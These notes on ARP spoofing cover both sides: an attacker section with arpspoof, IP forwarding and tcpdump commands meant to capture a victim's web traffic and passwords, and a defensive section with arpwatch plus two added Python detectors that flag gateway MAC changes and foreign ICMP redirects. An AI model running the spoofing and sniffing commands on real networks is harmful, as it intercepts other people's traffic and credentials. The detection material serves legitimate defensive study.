How to ARP SPOOFING & watch/prevent

Victim: install arpwatch to monitor ARP events

# On Victim:
apt install arpwatch
systemctl start arpwatch@eth0   # interface name: see ip link

# Start logging:
tail -f /var/log/syslog | grep arpwatch
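The syslog tail above shows raw arpwatch events; the point of running arpwatch on the victim is to notice when the gateway's MAC changes or keeps flipping. The following is an added example (not part of the original notes and not arpwatch's own code) that parses those lines and raises alerts. It assumes arpwatch's syslog layout of "event IP MAC [(old MAC)] iface" with unpadded hex octets; the log lines, IPs and MACs are constructed sample data.

```python
import re
from collections import Counter, defaultdict

# Assumption: arpwatch syslog lines look like
#   "... arpwatch: <event> <ip> <mac> [(<old mac>)] <iface>"
# with unpadded hex octets (e.g. 0:50:56:aa:bb:cc). Sample data below is constructed.
MAC_RE = r"[0-9a-fA-F]{1,2}(?::[0-9a-fA-F]{1,2}){5}"
EVENT_RE = re.compile(
    r"arpwatch: (?P<event>new station|new activity|changed ethernet address|"
    + r"flip flop|ethernet mismatch|bogon|reused old ethernet address)\s+"
    + r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<mac>" + MAC_RE + r")"
    + r"(?:\s+\((?P<old_mac>" + MAC_RE + r")\))?\s+(?P<iface>\S+)"
)

# Constructed sample: attacker 192.168.1.20 starts claiming the gateway 192.168.1.1.
SAMPLE_LOG = [
    "Jan  1 10:00:01 victim arpwatch: new station 192.168.1.20 0:50:56:aa:bb:cc eth0",
    "Jan  1 10:00:05 victim arpwatch: changed ethernet address 192.168.1.1 0:50:56:aa:bb:cc (0:11:22:33:44:55) eth0",
    "Jan  1 10:00:07 victim arpwatch: flip flop 192.168.1.1 0:11:22:33:44:55 (0:50:56:aa:bb:cc) eth0",
    "Jan  1 10:00:09 victim arpwatch: flip flop 192.168.1.1 0:50:56:aa:bb:cc (0:11:22:33:44:55) eth0",
    "Jan  1 10:00:10 victim sshd[123]: Accepted publickey for alice",  # unrelated noise
]


def normalize_mac(mac):
    """Pad each octet to two hex digits and lowercase, so 0:50:56:AA:bb:cc == 00:50:56:aa:bb:cc."""
    return ":".join(part.lower().zfill(2) for part in mac.split(":"))


def parse_arpwatch_line(line):
    """Return a dict with event/ip/mac/old_mac/iface, or None for non-arpwatch lines."""
    m = EVENT_RE.search(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["mac"] = normalize_mac(ev["mac"])
    if ev["old_mac"]:
        ev["old_mac"] = normalize_mac(ev["old_mac"])
    return ev


def detect_spoofing(lines, gateway_ip, gateway_mac=None, flip_flop_threshold=2):
    """Scan arpwatch log lines and return a list of alert strings.

    gateway_mac is the MAC recorded from a known-good state; if None, any
    change of the gateway's MAC is reported.
    """
    alerts = []
    flips = Counter()                 # flip flop events per IP
    ips_per_mac = defaultdict(set)    # which IPs each MAC has been seen claiming
    expected_gw = normalize_mac(gateway_mac) if gateway_mac else None

    for line in lines:
        ev = parse_arpwatch_line(line)
        if ev is None:
            continue
        ips_per_mac[ev["mac"]].add(ev["ip"])

        # Repeated flip flops for one IP: two stations fighting over it.
        if ev["event"] == "flip flop":
            flips[ev["ip"]] += 1
            if flips[ev["ip"]] == flip_flop_threshold:
                alerts.append(
                    f"{ev['ip']} flip-flopped {flip_flop_threshold} times "
                    f"between {ev['old_mac']} and {ev['mac']}"
                )

        # The gateway's MAC moved to something other than the pinned value.
        if ev["ip"] == gateway_ip and ev["event"] in ("changed ethernet address", "flip flop"):
            if expected_gw is None or ev["mac"] != expected_gw:
                alerts.append(
                    f"gateway {gateway_ip} now resolves to {ev['mac']} "
                    f"(was {ev['old_mac']}) - possible ARP poisoning"
                )

    # One MAC answering for several IPs is the classic poisoning signature.
    for mac, ips in ips_per_mac.items():
        if len(ips) > 1:
            alerts.append(f"MAC {mac} claims multiple IPs: {sorted(ips)}")
    return alerts


if __name__ == "__main__":
    for alert in detect_spoofing(SAMPLE_LOG, "192.168.1.1", "00:11:22:33:44:55"):
        print("ALERT:", alert)
```

To use it against a live box, feed it the lines from the `tail -f ... | grep arpwatch` pipe and pass the gateway's MAC as recorded before any incident; without that pinned value the detector can only say that the MAC changed, not which one is genuine.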

Attacker: Install tcpdump and arpspoof

apt install dsniff tcpdump

# Act as Proxy:
# fragrouter -B1
sysctl net.ipv4.conf.eth0.forwarding=1

arpspoof -i eth0 -c own -r -t <VICTIMIP> <ROUTERIP>
# -r means bidirectional poisoning!

tcpdump -i eth0 icmp
# Sniff some pw's on http/s traffic
# tshark -i ath0 -x -Y "http.request" dst host IPROUTER and dst port 80
tcpdump -A src <VICTIMIP> and '(tcp port 80) or (tcp port 443)'

Find malicious redirects on Victim side:

# ping 1.1.1.1
PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
From ATTACKER: icmp_seq=1 Redirect Host(New nexthop: ROUTER)
64 bytes from 1.1.1.1: icmp_seq=1 ttl=58 time=14.4 ms

# arp -a
ROUTER IP = ATTACKER MAC
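The two artefacts above (an ICMP redirect from a host that is not the router, and the router's IP carrying a foreign MAC in `arp -a`) can be checked mechanically. The following is an added example, not code from the original notes: it parses net-tools `arp -a` output and iputils ping output and compares the gateway entry against a MAC recorded from a known-good state. The sample outputs, addresses and MACs are constructed; the pinned gateway MAC is assumed to have been noted by the operator beforehand.

```python
import re

MAC_RE = r"[0-9a-fA-F]{1,2}(?::[0-9a-fA-F]{1,2}){5}"
# net-tools `arp -a` line: "_gateway (192.168.1.1) at 00:50:56:aa:bb:cc [ether] on eth0"
ARP_LINE_RE = re.compile(
    r"^\S+ \((?P<ip>[\d.]+)\) at (?P<mac>" + MAC_RE + r") \[ether\] on (?P<iface>\S+)"
)
# iputils ping redirect line: "From 192.168.1.20 icmp_seq=1 Redirect Host(New nexthop: 192.168.1.1)"
REDIRECT_RE = re.compile(
    r"From (?P<src>[^\s:]+):? icmp_seq=\d+ Redirect (?:Host|Network)"
    r"\(New nexthop: (?P<nexthop>[^)\s]+)\)"
)

# Constructed sample output: attacker 192.168.1.20 holds the gateway's IP in the ARP table
# and has sent a redirect; 192.168.1.30 is an unresolved entry that must be skipped.
ARP_SAMPLE = """\
_gateway (192.168.1.1) at 0:50:56:aa:bb:cc [ether] on eth0
? (192.168.1.20) at 0:50:56:aa:bb:cc [ether] on eth0
? (192.168.1.30) at <incomplete> on eth0
"""
PING_SAMPLE = """\
PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
From 192.168.1.20 icmp_seq=1 Redirect Host(New nexthop: 192.168.1.1)
64 bytes from 1.1.1.1: icmp_seq=1 ttl=58 time=14.4 ms
"""


def normalize_mac(mac):
    """Pad each octet to two hex digits and lowercase."""
    return ":".join(part.lower().zfill(2) for part in mac.split(":"))


def parse_arp_table(text):
    """Map IP -> normalized MAC for every resolved entry in `arp -a` output."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE_RE.match(line.strip())
        if m:
            table[m.group("ip")] = normalize_mac(m.group("mac"))
    return table


def parse_ping_redirects(text):
    """Return (sender, new nexthop) for every ICMP redirect shown in ping output."""
    return [(m.group("src"), m.group("nexthop")) for m in REDIRECT_RE.finditer(text)]


def victim_side_checks(arp_output, ping_output, gateway_ip, pinned_gateway_mac):
    """Compare live ARP/ping evidence against the pinned gateway MAC; return findings."""
    findings = []
    table = parse_arp_table(arp_output)
    pinned = normalize_mac(pinned_gateway_mac)

    seen = table.get(gateway_ip)
    if seen is None:
        findings.append(f"gateway {gateway_ip} missing from ARP table")
    elif seen != pinned:
        # Name any other IP that shares the MAC now sitting on the gateway entry.
        owners = sorted(ip for ip, mac in table.items() if mac == seen and ip != gateway_ip)
        msg = f"gateway {gateway_ip} maps to {seen}, expected {pinned}"
        if owners:
            msg += f"; same MAC as {owners}"
        findings.append(msg)

    # Only the real gateway has any business redirecting us.
    for src, nexthop in parse_ping_redirects(ping_output):
        if src != gateway_ip:
            findings.append(f"ICMP redirect from non-gateway {src} (new nexthop {nexthop})")
    return findings


if __name__ == "__main__":
    for finding in victim_side_checks(ARP_SAMPLE, PING_SAMPLE, "192.168.1.1", "00:11:22:33:44:55"):
        print("FINDING:", finding)
```

The ARP table by itself cannot say which MAC is the genuine router, so the comparison only works against a value recorded before the incident; an `<incomplete>` entry is skipped rather than treated as a mismatch.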
The "new station" and "flip flop" events show up here in the syslog tail. No sendmail (MTA) is installed at the moment, so arpwatch cannot mail its reports; check with:

which sendmail || echo "No MTA installed"